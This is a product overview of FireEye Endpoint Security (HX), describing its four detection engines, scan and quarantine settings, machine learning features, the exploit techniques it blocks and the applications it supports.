What is FireEye Endpoint Security (HX)?
FireEye Endpoint Security (HX) is an endpoint security solution that combines antivirus (EPP), next-generation antivirus (NGAV), and EDR. For redundant protection of endpoints, the solution is equipped with a total of four engines: a conventional antivirus engine, a machine learning (AI) engine, a behavior detection engine, and an infringement activity data (IOC) engine. Since the agent program operates in kernel mode, it accurately determines malicious behavior and collects detailed activity logs.
Features
◆Equipped with four different engines. Provide multi-directional detection and protection against attacks
- Detects existing threats based on signatures (Malware Protection)
- Uses machine learning to detect against unknown threats and advanced attacks (Malware Guard)
- Uses behavior detection to detect exploits for applications and the web (Exploit Guard)
- Uses FireEye Threat Intelligence for detection (RealTime Indicator)
◆Intuitive interface that is easy-to-understand and easy-to-use
The service will solve problems such as the following:
- Want to constantly implement the latest security for endpoints in order to protect against threats
- Want to introduce security that can handle unknown threats
- Want to use security that is capable of response even if a file infected with malware is accessed
Main Functions
Malware protection: conventional antivirus
Real-time scan
- Scan file at time of access
- Scan network file (can be set as “enabled” or “disabled”)
Scheduled scan
- Daily / Weekly / Monthly / When updating virus definition / When launching the system
- Scan level: Full disk, Quick scan, Active memory
File isolation
- Encrypted and isolated to endpoint for 90 days by default (setting can be changed from 1 day to 365 days)
- Restore/delete
- Download to Endpoint Security Server
Others
- Skip scanning for Windows OS files and duplicate files
- Support for Windows early launch anti-malware driver (ELAM)
Malware Guard: Uses machine learning (AI) for measures against unknown malware
◆ Collect hundreds of millions of executable files (.exe, .dll, .sys, etc.)
◆ Collect the latest unknown malware from FireEye products and services
◆ Extract over 2,000 static features to learn unique features
- Degree of randomness for file bytes
- File header
- Address table, etc.
◆ Manually correct learning data
◆Encrypted transmission of learning data
◆ Concurrent use with AV of other companies is possible
◆ Supports a configuration that does not send user data outside the system (1Way)
Exploit Guard: Detects and blocks exploits used in the early stages of intrusion
Example of exploit methods that can be detected
- Memory Corruption (BOF, ROP, etc.)
- Heap spray
- MS Office Macros
- Embedded binary launch
- Java sandbox bypass
- Kernel exploit
Supported application
- Browsers: IE, FireFox, Chrome
- Browser plug-in
- Adobe Acrobat、Flash
- MS Office: Word、Excel、PowerPoint
- Wordpad
- Java Applet runner
Real-time indicator: Distribute IOC to all endpoints in order to detect/block attacks in real time
- IOC is generated based on actual intrusion activity
- The generated IOC is distributed to all endpoints
- The incident can be declared as closed by isolating all endpoints that match the IOC